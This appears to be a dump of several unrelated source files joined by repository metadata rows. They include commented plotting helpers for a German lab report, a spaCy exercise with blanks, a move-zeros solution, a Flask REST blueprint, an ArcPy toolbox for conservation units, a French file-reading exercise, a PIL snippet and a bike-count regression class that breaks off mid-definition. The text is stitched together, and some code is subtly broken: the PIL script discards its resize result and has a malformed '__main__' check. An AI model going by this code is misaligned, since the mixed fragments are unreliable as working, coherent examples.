# U = 1e3 * unp.uarray(U, U_err)
# Rx_mean = np.mean(Rx) # mean and systematic error
# Rx_mean_err = MeanError(noms(Rx)) # error of the mean
#
## relative errors for later comparison in the discussion
# RelFehler_G = (G_mess - G_lit) / G_lit
# RelFehler_B = (B_mess - B_lit) / B_lit
# write('build/RelFehler_G.tex', make_SI(RelFehler_G*100, r'\percent', figures=1))
# write('build/RelFehler_B.tex', make_SI(RelFehler_B*100, r'\percent', figures=1))
########## CURVE FIT ##########
# def f(t, a, b, c, d):
# return a * np.sin(b * t + c) + d
#
# params = ucurve_fit(f, t, U, p0=[1, 1e3, 0, 0]) # p0 are the initial guesses for the fit parameters
# params = ucurve_fit(reg_linear, x, y) # linear fit
# params = ucurve_fit(reg_quadratic, x, y) # quadratic fit
# params = ucurve_fit(reg_cubic, x, y) # cubic fit
# a, b = params
# write('build/parameter_a.tex', make_SI(a * 1e-3, r'\kilo\volt', figures=1)) # number of significant figures
# write('build/parameter_b.tex', make_SI(b * 1e-3, r'\kilo\hertz', figures=2)) # number of significant figures
########## PLOTTING ##########
# plt.clf # clear actual plot before generating a new one
#
## automatically choosing limits with existing array T1
# t_plot = np.linspace(np.amin(T1), np.amax(T1), 100)
# plt.xlim(t_plot[0]-1/np.size(T1)*(t_plot[-1]-t_plot[0]), t_plot[-1]+1/np.size(T1)*(t_plot[-1]-t_plot[0]))
#
## hard coded limits
# t_plot = np.linspace(-0.5, 2 * np.pi + 0.5, 1000) * 1e-3
#
## standard plotting
# plt.plot(t_plot * 1e3, f(t_plot, *noms(params)) * 1e-3, 'b-', label='Fit')
# plt.plot(t * 1e3, U * 1e3, 'rx', label='Messdaten')
## plt.errorbar(B * 1e3, noms(y) * 1e5, fmt='rx', yerr=stds(y) * 1e5, label='Messdaten') # with error bars
## plt.xscale('log') # logarithmic x-axis
# plt.xlim(t_plot[0] * 1e3, t_plot[-1] * 1e3)
# plt.xlabel(r'$t \:/\: \si{\milli\second}$')
# plt.ylabel(r'$U \:/\: \si{\kilo\volt}$')
# plt.legend(loc='best')
# plt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)
# plt.savefig('build/aufgabenteil_a_plot.pdf')
########## WRITING TABLES ##########
### IF THERE IS ONLY ONE COLUMN IN A TABLE (workaround):
## a=np.array([Wert_d[0]])
## b=np.array([Rx_mean])
## c=np.array([Rx_mean_err])
## d=np.array([Lx_mean*1e3])
## e=np.array([Lx_mean_err*1e3])
#
# write('build/Tabelle_b.tex', make_table([a,b,c,d,e],[0, 1, 0, 1, 1])) # every value with an uncertainty gets two columns
# write('build/Tabelle_b_texformat.tex', make_full_table(
# 'Messdaten Kapazitätsmessbrücke.',
# 'table:A2',
# 'build/Tabelle_b.tex',
# [1,2,3,4,5], # careful: these numbers denote the resulting column indices
# # that are to be rendered as multicolumns
# ['Wert',
# r'$C_2 \:/\: \si{\nano\farad}$',
# r'$R_2 \:/\: \si{\ohm}$',
# r'$R_3 / R_4$', '$R_x \:/\: \si{\ohm}$',
# r'$C_x \:/\: \si{\nano\farad}$']))
#
## splitting tables if they get too long
# t1, t2 = np.array_split(t * 1e3, 2)
# U1, U2 = np.array_split(U * 1e-3, 2)
# write('build/loesung-table.tex', make_table([t1, U1, t2, U2], [3, None, 3, None])) # number of decimal places
#
## merging tables (raw data only, the number of rows must match)
# write('build/Tabelle_b_composed.tex', make_composed_table(['build/Tabelle_b_teil1.tex','build/Tabelle_b_teil2.tex']))
########## ARRAY FUNCTIONS ##########
# np.arange(2,10) # creates an ascending array from 2 to 10
# np.zeros(15) # creates an array of 15 zeros
# np.ones(15) # creates an array of 15 ones
#
# np.amin(array) # returns the smallest value in an array
# np.argmin(array) # returns the index of the minimum of an array
# np.amax(array) # returns the largest value in an array
# np.argmax(array) # returns the index of the maximum of an array
#
# a1,a2 = np.array_split(array, 2) # split an array into two halves
# np.size(array) # number of elements in an array
########## ARRAY INDEXING ##########
# y[n - 1::n] # returns every n-th value of an array, as an array
########## DIFFERENT STUFF ##########
# R = const.physical_constants["molar gas constant"] # Array of value, unit, error
| 35.873444 | 148 | 0.636863 |
9b0826525a573c30f78599e5c2771508af5331a2
| 218 |
py
|
Python
|
exercises/ja/exc_02_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/exc_02_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/exc_02_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
from spacy.lang.ja import Japanese
nlp = Japanese()
doc = nlp("私はネコを飼っています")
# 単語「ネコ」のハッシュを引く
cat_hash = ____.____.____[____]
print(cat_hash)
# cat_hashを使って文字列を引く
cat_string = ____.____.____[____]
print(cat_string)
| 16.769231 | 34 | 0.756881 |
f1e59d5569716344616dbf26c5bd9458ed237e7e
| 347 |
py
|
Python
|
lintcode/539-Move-Zeros/MoveZeros.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
lintcode/539-Move-Zeros/MoveZeros.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
lintcode/539-Move-Zeros/MoveZeros.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution:
# @param {int[]} nums an integer array
# @return nothing, do this in-place
def moveZeroes(self, nums):
        # Write your code here
        # two-pointer pass: i marks the slot where the next non-zero value belongs
        i = 0
        for j in range(len(nums)):  # range instead of the Python-2-only xrange
            if nums[j]:
                num = nums[j]
                nums[j] = 0
                nums[i] = num
                i += 1
| 26.692308 | 42 | 0.446686 |
9e2bb957a798bcb2557b75ebaba83c41c3c3def7
| 1,879 |
py
|
Python
|
projects/api/components.py
|
Matheus158257/projects
|
26a6148046533476e625a872a2950c383aa975a8
|
[
"Apache-2.0"
] | null | null | null |
projects/api/components.py
|
Matheus158257/projects
|
26a6148046533476e625a872a2950c383aa975a8
|
[
"Apache-2.0"
] | null | null | null |
projects/api/components.py
|
Matheus158257/projects
|
26a6148046533476e625a872a2950c383aa975a8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Components blueprint."""
from flask import jsonify, request
from flask_smorest import Blueprint
from ..controllers.components import create_component, get_component, update_component, \
delete_component, pagination_components, total_rows_components
from ..utils import to_snake_case
bp = Blueprint("components", __name__)
@bp.route("", methods=["GET"])
@bp.paginate(page=0)
def handle_list_components(pagination_parameters):
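    """Handles GET requests to /, with optional name filter and pagination."""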
name = request.args.get('name')
total_rows = total_rows_components(name=name)
components = pagination_components(name=name,
page=pagination_parameters.page,
page_size=pagination_parameters.page_size)
response = {
'total': total_rows,
'components': components
}
return jsonify(response)
@bp.route("", methods=["POST"])
def handle_post_components():
"""Handles POST requests to /."""
kwargs = request.get_json(force=True)
kwargs = {to_snake_case(k): v for k, v in kwargs.items()}
component = create_component(**kwargs)
return jsonify(component)
@bp.route("<component_id>", methods=["GET"])
def handle_get_component(component_id):
"""Handles GET requests to /<component_id>."""
return jsonify(get_component(uuid=component_id))
@bp.route("<component_id>", methods=["PATCH"])
def handle_patch_component(component_id):
"""Handles PATCH requests to /<component_id>."""
kwargs = request.get_json(force=True)
kwargs = {to_snake_case(k): v for k, v in kwargs.items()}
component = update_component(uuid=component_id, **kwargs)
return jsonify(component)
@bp.route("<component_id>", methods=["DELETE"])
def handle_delete_component(component_id):
"""Handles DELETE requests to /<component_id>."""
return jsonify(delete_component(uuid=component_id))
| 32.964912 | 89 | 0.694518 |
9ec33186eb7b6cdb6b8c5328c5c97037f1e38781
| 19,617 |
pyt
|
Python
|
PGLMT_Tools/SpatialTools/CMU_Tool_v1.pyt
|
PNHP/PGLMT
|
faa5eb8f92771e37f777c580877d91334f2421fe
|
[
"MIT"
] | null | null | null |
PGLMT_Tools/SpatialTools/CMU_Tool_v1.pyt
|
PNHP/PGLMT
|
faa5eb8f92771e37f777c580877d91334f2421fe
|
[
"MIT"
] | null | null | null |
PGLMT_Tools/SpatialTools/CMU_Tool_v1.pyt
|
PNHP/PGLMT
|
faa5eb8f92771e37f777c580877d91334f2421fe
|
[
"MIT"
] | null | null | null |
#-------------------------------------------------------------------------------
# Name: CMU Tool 1.0
# Purpose:
# Author: Molly Moore
# Created: 10/13/2021
#-------------------------------------------------------------------------------
######################################################################################################################################################
## Import packages and define environment settings
######################################################################################################################################################
import arcpy,os,sys,string
from getpass import getuser
import sqlite3 as lite
import pandas as pd
arcpy.env.overwriteOutput = True
arcpy.env.transferDomains = True
######################################################################################################################################################
## Define universal variables and functions
######################################################################################################################################################
def element_type(elcode):
"""Takes ELCODE as input and returns CMU element type code."""
if elcode.startswith('AAAA'):
et = 'AAAA'
elif elcode.startswith('AAAB'):
et = 'AAAB'
elif elcode.startswith('AB'):
et = 'AB'
elif elcode.startswith('AF'):
et = 'AF'
elif elcode.startswith('AM'):
et = 'AM'
elif elcode.startswith('AR'):
et = 'AR'
elif elcode.startswith('C') or elcode.startswith('H'):
et = 'CGH'
elif elcode.startswith('ICMAL'):
et = 'ICMAL'
elif elcode.startswith('ILARA'):
et = 'ILARA'
elif elcode.startswith('IZSPN'):
et = 'IZSPN'
elif elcode.startswith('IICOL02'):
et = 'IICOL02'
elif elcode.startswith('IICOL'):
et = 'IICOL'
elif elcode.startswith('IIEPH'):
et = 'IIEPH'
elif elcode.startswith('IIHYM'):
et = 'IIHYM'
elif elcode.startswith('IILEP'):
et = 'IILEP'
elif elcode.startswith('IILEY') or elcode.startswith('IILEW') or elcode.startswith('IILEV') or elcode.startswith('IILEU'):
et = 'IILEY'
elif elcode.startswith('IIODO'):
et = 'IIODO'
elif elcode.startswith('IIORT'):
et = 'IIORT'
elif elcode.startswith('IIPLE'):
et = 'IIPLE'
elif elcode.startswith('IITRI'):
et = 'IITRI'
elif elcode.startswith('IMBIV'):
et = 'IMBIV'
elif elcode.startswith('IMGAS'):
et = 'IMGAS'
elif elcode.startswith('I'):
et = 'I'
elif elcode.startswith('N'):
et = 'N'
elif elcode.startswith('P'):
et = 'P'
else:
arcpy.AddMessage("Could not determine element type")
et = None
return et
######################################################################################################################################################
## Begin toolbox
######################################################################################################################################################
class Toolbox(object):
def __init__(self):
"""Define the toolbox (the name of the toolbox is the name of the .pyt file)."""
self.label = "CMU Tools v1"
self.alias = "CMU Tools v1"
self.canRunInBackground = False
self.tools = [CreateCMU,FillAttributes]
######################################################################################################################################################
## Begin create CMU tool - this tool creates the core and supporting CMUs and fills their initial attributes
######################################################################################################################################################
class CreateCMU(object):
def __init__(self):
self.label = "1 Create CMU"
self.description = ""
self.canRunInBackground = False
def getParameterInfo(self):
site_name = arcpy.Parameter(
displayName = "Site Name",
name = "site_name",
datatype = "GPString",
parameterType = "Required",
direction = "Input")
site_desc = arcpy.Parameter(
displayName = "Site Description",
name = "site_desc",
datatype = "GPString",
parameterType = "Optional",
direction = "Input")
cpp_core = arcpy.Parameter(
displayName = "Selected CPP Core(s)",
name = "cpp_core",
datatype = "GPFeatureLayer",
parameterType = "Required",
direction = "Input")
cpp_core.value = r'CPP\CPP Core'
params = [site_name,site_desc,cpp_core]
return params
def isLicensed(self):
return True
def updateParameters(self, params):
return
def updateMessages(self, params):
return
def execute(self, params, messages):
site_name = params[0].valueAsText
site_desc = params[1].valueAsText
cpp_core = params[2].valueAsText
mem_workspace = "memory"
cmu = r"PGLMT_v2\\CMU"
spec_tbl = r"PNHP.DBO.CMU_SpeciesTable"
eo_reps = r'W:\\Heritage\\Heritage_Data\\Biotics_datasets.gdb\\eo_reps'
######################################################################################################################################################
## create CMU shape and get CMU attributes
######################################################################################################################################################
desc = arcpy.Describe(cpp_core)
if not desc.FIDSet == '':
pass
else:
arcpy.AddWarning("No CPP Cores are selected. Please make a selection and try again.")
sys.exit()
desc = arcpy.Describe(cmu)
if not desc.FIDSet == '':
arcpy.AddWarning("There is currently a selection on the CMU layer. Please clear the selection and try again.")
sys.exit()
else:
pass
arcpy.AddMessage("......")
# create list of eo ids for all selected CPPs that are current or approved
with arcpy.da.SearchCursor(cpp_core,["EO_ID","Status"]) as cursor:
eoids = sorted({row[0] for row in cursor if row[1] != "n"})
# create list of eo ids for all selected CPPs that are not approved
with arcpy.da.SearchCursor(cpp_core,["EO_ID","Status"]) as cursor:
            excluded_eoids = sorted({row[0] for row in cursor if row[1] == "n"})
# add reporting messages about which CPPs are being excluded
if excluded_eoids:
arcpy.AddWarning("Selected CPPs with the following EO IDs are being excluded because they were marked as not approved: "+ ','.join([str(x) for x in excluded_eoids]))
else:
pass
# add reporting messages about which CPPs are being included and exit with message if no selected CPPs are current or approved.
if len(eoids) != 0:
arcpy.AddMessage("Selected CPPs with the following EO IDs are being used to create this CMU: "+','.join([str(x) for x in eoids]))
arcpy.AddMessage("......")
else:
arcpy.AddWarning("Your CPP selection does not include any current or approved CPPs and we cannot proceed. Goodbye.")
sys.exit()
# create sql query based on number of CPPs included in query.
if len(eoids) > 1:
sql_query = '"EO_ID" in {}'.format(tuple(eoids))
else:
sql_query = '"EO_ID" = {}'.format(eoids[0])
arcpy.AddMessage("Creating and attributing CMU core for site: "+ site_name)
arcpy.AddMessage("......")
# create cpp_core layer from selected CPPs marked as current or approved and dissolve to create temporary CMU geometry
cpp_core_lyr = arcpy.MakeFeatureLayer_management(cpp_core, "cpp_core_lyr", sql_query)
temp_cmu = os.path.join(mem_workspace,"temp_cmu")
temp_cmu = arcpy.Dissolve_management(cpp_core_lyr, temp_cmu)
# get geometry token from cmu
with arcpy.da.SearchCursor(temp_cmu,"SHAPE@") as cursor:
for row in cursor:
geom = row[0]
# calculate CMU_JOIN_ID which includes network username and the next highest tiebreaker for that username padded to 6 places
username = getuser().lower()
where = '"CMU_JOIN_ID" LIKE'+"'%{0}%'".format(username)
with arcpy.da.SearchCursor(cmu, 'CMU_JOIN_ID', where_clause = where) as cursor:
join_ids = sorted({row[0] for row in cursor})
if len(join_ids) == 0:
cmu_join_id = username + '000001'
else:
t = join_ids[-1]
tiebreak = str(int(t[-6:])+1).zfill(6)
cmu_join_id = username + tiebreak
# test for unsaved edits - alert user to unsaved edits and end script
try:
# open editing session and insert new CMU record
values = [site_name,"D",site_desc,cmu_join_id,geom]
fields = ["SITE_NAME","STATUS","BRIEF_DESC","CMU_JOIN_ID","SHAPE@"]
with arcpy.da.InsertCursor(cmu,fields) as cursor:
cursor.insertRow(values)
except RuntimeError:
arcpy.AddWarning("You have unsaved edits in your CMU layer. Please save or discard edits and try again.")
sys.exit()
######################################################################################################################################################
## Insert species records into CMU species table
######################################################################################################################################################
SpeciesInsert = []
# report which EOs were included in CMU and add EO records to list to be inserted into CMU species table
arcpy.AddMessage("The following species records have been added to the CMU Species Table for CMU with site name, "+site_name+":")
for eoid in eoids:
with arcpy.da.SearchCursor(eo_reps, ["ELCODE","ELSUBID","SNAME","SCOMNAME","EO_ID"], '"EO_ID" = {}'.format(eoid)) as cursor:
for row in cursor:
values = tuple([row[0],row[1],row[2],row[3],element_type(row[0]),row[4],cmu_join_id])
arcpy.AddMessage(values)
SpeciesInsert.append(values)
arcpy.AddMessage("......")
# insert EO records into CMU species table
for insert in SpeciesInsert:
with arcpy.da.InsertCursor(spec_tbl, ["ELCODE","ELSUBID","SNAME","SCOMNAME","ELEMENT_TYPE","EO_ID","CMU_JOIN_ID"]) as cursor:
cursor.insertRow(insert)
# report about EOs that overlap the CMU, but were not included in the CMU species table
eo_reps_full = arcpy.MakeFeatureLayer_management(eo_reps,"eo_reps_full")
arcpy.SelectLayerByLocation_management(eo_reps_full,"INTERSECT",temp_cmu,selection_type="NEW_SELECTION")
arcpy.AddWarning("The following EO rep records intersected your CMU, but do not have a CPP drawn:")
with arcpy.da.SearchCursor(eo_reps_full,["EO_ID","SNAME","SCOMNAME","LASTOBS_YR","EORANK","EO_TRACK","EST_RA","PREC_BCD"]) as cursor:
for row in cursor:
if row[0] not in eoids:
arcpy.AddWarning(row)
else:
pass
arcpy.AddMessage("......")
arcpy.AddMessage("The initial CMU was created for site name, "+site_name+". Please make any necessary manual edits. Once spatial edits are complete, don't forget to run step 2. Fill CMU Spatial Attributes")
######################################################################################################################################################
## Begin fill CMU spatial attributes tool which finishes attributes that depend on manual edits
######################################################################################################################################################
class FillAttributes(object):
def __init__(self):
"""Define the tool (tool name is the name of the class)."""
self.label = "2 Fill CMU Spatial Attributes"
self.description = ""
self.canRunInBackground = False
def getParameterInfo(self):
cmu = arcpy.Parameter(
displayName = "Selected CMU Layer",
name = "cmu",
datatype = "GPFeatureLayer",
parameterType = "Required",
direction = "Input")
cmu.value = r"PGLMT_v2\\CMU"
pgc_cover = arcpy.Parameter(
displayName = "PGC Cover Type Layer",
name = "pgc_cover",
datatype = "GPFeatureLayer",
parameterType = "Required",
direction = "Input")
params = [cmu,pgc_cover]
return params
def isLicensed(self):
return True
def updateParameters(self, params):
return
def updateMessages(self, params):
return
def execute(self, params, messages):
cmu = params[0].valueAsText
pgc_cover = params[1].valueAsText
mem_workspace = "memory"
# define paths
username = getuser().lower()
muni = r'C:\\Users\\'+username+r'\\AppData\\Roaming\\Esri\\ArcGISPro\\Favorites\\StateLayers.Default.pgh-gis0.sde\\StateLayers.DBO.Boundaries_Political\\StateLayers.DBO.PaMunicipalities'
pgl = r'C:\\Users\\'+username+r'\\AppData\\Roaming\\Esri\\ArcGISPro\\Favorites\\StateLayers.Default.pgh-gis0.sde\\StateLayers.DBO.Protected_Lands\\StateLayers.DBO.PGC_StateGameland'
boundaries_tbl = r"PNHP.DBO.CMU_PoliticalBoundaries"
cover_tbl = r"PNHP.DBO.PGC_CoverTypes"
# check for selection on CMU layer and exit if there is no selection
desc = arcpy.Describe(cmu)
if not desc.FIDSet == '':
pass
else:
arcpy.AddWarning("No CMUs are selected. Please make a selection and try again.")
sys.exit()
# create list of CMU Join IDs for selected CMUs
with arcpy.da.SearchCursor(cmu,["CMU_JOIN_ID"]) as cursor:
cmu_selected = sorted({row[0] for row in cursor})
# start loop to attribute each selected CMU
for c in cmu_selected:
arcpy.AddMessage("Attributing CMU: "+c)
arcpy.AddMessage("......")
# delete previous records in boundaries table if they have same CMU Join ID
with arcpy.da.UpdateCursor(boundaries_tbl,["CMU_JOIN_ID"]) as cursor:
for row in cursor:
if row[0] == c:
cursor.deleteRow()
# delete previous records in PGC cover types table if they have same CMU Join ID
with arcpy.da.UpdateCursor(cover_tbl,["CMU_JOIN_ID"]) as cursor:
for row in cursor:
if row[0] == c:
cursor.deleteRow()
# make feature layer of cmu join id in loop
sql_query = "CMU_JOIN_ID = '{}'".format(c)
cmu_lyr = arcpy.MakeFeatureLayer_management(cmu, "cmu_lyr", sql_query)
######################################################################################################################################################
## calculate acres for CMU
######################################################################################################################################################
# test for unsaved edits - alert user to unsaved edits and end script
try:
with arcpy.da.UpdateCursor(cmu_lyr,["ACRES","SHAPE@"]) as cursor:
for row in cursor:
acres = round(row[1].getArea("GEODESIC","ACRES"),3)
row[0] = acres
arcpy.AddMessage(c +" Acres: "+str(acres))
arcpy.AddMessage("......")
cursor.updateRow(row)
except RuntimeError:
arcpy.AddWarning("You have unsaved edits in your CMU layer. Please save or discard edits and try again.")
sys.exit()
######################################################################################################################################################
## attribute boundaries table
######################################################################################################################################################
# attribute the counties and municipalities based on those that intersect the CMU
boundary_union = arcpy.Intersect_analysis([muni,pgl],os.path.join(mem_workspace,"boundary_union"))
boundary_union_lyr = arcpy.MakeFeatureLayer_management(boundary_union,"boundary_union_lyr")
arcpy.SelectLayerByLocation_management(boundary_union_lyr,"INTERSECT",cmu_lyr,selection_type="NEW_SELECTION")
MuniInsert = []
with arcpy.da.SearchCursor(boundary_union_lyr,["CountyName","FullName","NAME"]) as cursor:
for row in cursor:
values = tuple([row[0].title(),row[1],"SGL "+row[2],c])
MuniInsert.append(values)
arcpy.AddMessage(c + " Boundaries: ")
for insert in MuniInsert:
with arcpy.da.InsertCursor(boundaries_tbl,["COUNTY","MUNICIPALITY","SGL","CMU_JOIN_ID"]) as cursor:
arcpy.AddMessage(insert)
cursor.insertRow(insert)
arcpy.AddMessage("......")
######################################################################################################################################################
## attribute pgc cover table
######################################################################################################################################################
# tabulate intersection to get percent and cover type that overlaps cmu
tab_area = arcpy.TabulateIntersection_analysis(cmu_lyr,arcpy.Describe(cmu_lyr).OIDFieldName,pgc_cover,os.path.join(mem_workspace,"tab_area"),"COVER_TYPE")
# insert name and percent overlap of protected lands
CoverInsert = []
with arcpy.da.SearchCursor(tab_area,["COVER_TYPE","PERCENTAGE"]) as cursor:
for row in cursor:
if row[0] is None:
pass
else:
values = tuple([row[0],round(row[1],2),c])
CoverInsert.append(values)
arcpy.AddMessage(c + " Cover Types: ")
if CoverInsert:
for insert in CoverInsert:
with arcpy.da.InsertCursor(cover_tbl,["COVER_TYPE","PERCENT_","CMU_JOIN_ID"]) as cursor:
arcpy.AddMessage(insert)
cursor.insertRow(insert)
else:
arcpy.AddMessage("No cover types overlap the CMU.")
arcpy.AddMessage("#########################################################")
arcpy.AddMessage("#########################################################")
######################################################################################################################################################
######################################################################################################################################################
| 47.26988 | 214 | 0.49136 |
7bbf8607b265b026762aad4945f2617ae6463ddd
| 570 |
py
|
Python
|
Licence 1/I22/TP 5/tp_5_1.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | 8 |
2020-11-26T20:45:12.000Z
|
2021-11-29T15:46:22.000Z
|
Licence 1/I22/TP 5/tp_5_1.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | null | null | null |
Licence 1/I22/TP 5/tp_5_1.py
|
axelcoezard/licence
|
1ed409c4572dea080169171beb7e8571159ba071
|
[
"MIT"
] | 6 |
2020-10-23T15:29:24.000Z
|
2021-05-05T19:10:45.000Z
|
""" LECTURE D'UN FICHIER TEXTE """
"""
QUESTION 1
"""
with open("texte1", "r+") as f:
print(f.read(11), end="\n\n")
"""
QUESTION 2
"""
with open("texte1", "r+") as f:
print(f.readline(), end="\n\n")
f.readline()
print(f.readline(), end="\n\n")
"""
QUESTION 3
"""
with open("texte1", "r+") as f:
lines = f.readlines()
print(lines[1], lines[3])
"""
QUESTION 1
"""
with open("texte1", "r+") as f:
for i in range(3):
print(f.readline())
"""
QUESTION 2
"""
with open("texte1", "r+") as f:
print(f.read(3))
| 15.833333 | 35 | 0.508772 |
c8790e15303865c0b0baf5fa082a0c96c3fc3aa4
| 222 |
py
|
Python
|
project_9.py
|
cornelia247/cil-internship-cohort-01
|
b8184337056d378eab16d26b40b26ed58cd177bb
|
[
"MIT"
] | null | null | null |
project_9.py
|
cornelia247/cil-internship-cohort-01
|
b8184337056d378eab16d26b40b26ed58cd177bb
|
[
"MIT"
] | null | null | null |
project_9.py
|
cornelia247/cil-internship-cohort-01
|
b8184337056d378eab16d26b40b26ed58cd177bb
|
[
"MIT"
] | null | null | null |
from PIL import Image
def main():
    filename = 'py.png'
    image = Image.open(filename)
    image = image.copy()
    width, height = image.size  # original dimensions
    image = image.resize((400, 100))  # resize returns a new image, so assign the result
if __name__ == '__main__':  # '__main__' needs double underscores
    main()
| 22.2 | 38 | 0.608108 |
cdd0d71170bba8b813445c9e29298422b1e99a51
| 333 |
py
|
Python
|
src/onegov/feriennet/views/shared.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/views/shared.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/views/shared.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.user import User, UserCollection
from sqlalchemy import func
def users_for_select_element(request):
u = UserCollection(request.session).query()
u = u.with_entities(User.id, User.username, User.title, User.realname)
u = u.order_by(func.lower(User.title))
u = u.filter_by(active=True)
return tuple(u)
| 30.272727 | 74 | 0.735736 |
8d35d2407bdbf7ca4099ed4b2f0b491041cc2935
| 9,234 |
py
|
Python
|
Bikecounter/prediction.py
|
cfleschhut/virushack
|
2fe7ded0be8672b066edef7fed52573794db2ba5
|
[
"Apache-2.0"
] | 29 |
2020-03-21T00:47:51.000Z
|
2021-07-17T15:50:33.000Z
|
Bikecounter/prediction.py
|
cfleschhut/virushack
|
2fe7ded0be8672b066edef7fed52573794db2ba5
|
[
"Apache-2.0"
] | 7 |
2020-03-21T14:04:26.000Z
|
2022-03-02T08:05:40.000Z
|
Bikecounter/prediction.py
|
cfleschhut/virushack
|
2fe7ded0be8672b066edef7fed52573794db2ba5
|
[
"Apache-2.0"
] | 13 |
2020-03-21T01:08:08.000Z
|
2020-04-08T17:21:11.000Z
|
import json
import os
import pandas as pd
import numpy as np
from datetime import datetime
import statsmodels.formula.api as sm
from matplotlib import pyplot as plt
from statsmodels.iolib.smpickle import load_pickle
try:
# modifies path if used in ipython / jupyter
get_ipython().__class__.__name__
os.chdir(os.path.dirname(__file__))
except:
pass
class BikePrediction:
province_abbs = {
'Baden-Württemberg' : 'BW',
'Bayern' : 'BY',
'Berlin' : 'BE',
'Brandenburg' : 'BB',
'Bremen' : 'HB',
'Hamburg' : 'HH',
'Hessen' : 'HE',
'Mecklenburg-Vorpommern' : 'MV',
'Niedersachsen' : 'NI',
'Nordrhein-Westfalen' : 'NW',
'Rheinland-Pfalz' : 'RP',
'Saarland' : 'SL',
'Sachsen' : 'SN',
'Sachsen-Anhalt' : 'ST',
'Schleswig-Holstein' : 'SH',
'Thüringen' : 'TH'
}
def __init__(self):
self.dummies = ["month_" + str(i+1) for i in range(12)]
self.dummies.extend(["weekday_" + str(i) for i in range(7)])
def enrich_df(self, df):
""" Adds dummy variables to dataframe """
df["year"] = df.date.apply(lambda x: x.year)
df["month"] = df.date.apply(lambda x: x.month)
df["weekday"] = df.date.apply(lambda x: x.weekday())
if "bike_count" in df:
# only for training
df["bike_count"] = df.bike_count.astype("float16")
df = df.join(pd.get_dummies(df.weekday, prefix="weekday"))
month_columns = ['month_'+ str(i) for i in range(1,13)]
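    # reindex guarantees all twelve month dummy columns exist even when some months are missing from the data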
df = df.join(pd.get_dummies(df.month, prefix="month").reindex(columns=month_columns, fill_value=0))
# for d in self.dummies:
# df[d] = df[d.split("_")[0]].apply(lambda x: 1 if x == d.split("_")[1] else 0)
return df
def train(
self,
path_to_training_data="whole_json1.json",
out_path="prediction_parameters"):
""" This trains and saves a model for all stations found in
path.json file. Output folder defaults to /prediction_parameters."""
data_json = json.load(open(path_to_training_data, "r"))
data = pd.DataFrame(eval(data_json))
# take care of dtypes
data.date = data.date.apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))
data.bike_count = pd.to_numeric(data.bike_count)
data.lon = pd.to_numeric(data.lon)
data.lat = pd.to_numeric(data.lat)
stations = data.name.unique()
for station in stations:
print("start training for station %s", station)
# load data and skip last row. Last row contains the overall sum.
df = data[data.name == station]
# define new columns for regression (happens inplace)
df = self.enrich_df(df)
# Perform regression but use data only until 2020-01-01
result = sm.ols(formula="""
bike_count ~
year +
month_1 +
month_2 +
month_3 +
month_4 +
month_5 +
month_6 +
month_7 +
month_8 +
month_9 +
month_10 +
month_11 +
month_12 +
weekday_0 +
weekday_1 +
weekday_2 +
weekday_3 +
weekday_4 +
weekday_5 +
weekday_6 +
temperature +
precipitation +
snowdepth +
windspeed +
sunshine +
is_holiday
""", data=df[(df.date < datetime(2020, 1, 1))]).fit()
result.save(os.path.join(out_path, station + ".model"))
# visualize
df["bike_count_prediction"] = result.predict(df)
df[(df.date > datetime(2019,1,1))].plot(
x="date",
y=["bike_count", "bike_count_prediction"],
linewidth=1,
title="""
trained with data until 2020-01-01 \n
displayed data from 2019 onwards \n
Station %s""" % station)
plt.ylabel("bike count")
plt.tight_layout()
plt.savefig(os.path.join(out_path, "prediction_%s.png" % station))
plt.close()
print("model and visualization saved to '%s'" % out_path)
def predict_single(self, station_string, day, temperature, precipitation, snowdepth, windspeed, sunshine, is_holiday, path_to_models="prediction_parameters" ):
""" Makes a prediction for a station_string and a given day """
    if not type(day) == datetime:
      raise TypeError("Please pass a proper datetime object.")
    df = pd.DataFrame([day], columns=["date"])
    df = self.enrich_df(df)  # enrich_df returns a new frame, so assign the result
    # the fitted formula also needs the weather and holiday regressors
    df["temperature"] = temperature
    df["precipitation"] = precipitation
    df["snowdepth"] = snowdepth
    df["windspeed"] = windspeed
    df["sunshine"] = sunshine
    df["is_holiday"] = is_holiday
    for d in self.dummies:
      if not d in df:
        df[d] = 0
    df["month_" + str(df.iloc[0].month)] = 1
    df["weekday_" + str(df.iloc[0].weekday)] = 1
    # load model and predict
    model = load_pickle(os.path.join(path_to_models, station_string + ".model"))
    df["prediction"] = model.predict(df)
# return prediction as plain number
return df.iloc[0]["prediction"]
def predict_series(self, station_string, days, temperatures, precipitations, snowdepths, windspeeds, sunshines, is_holidays, path_to_models="prediction_parameters" ):
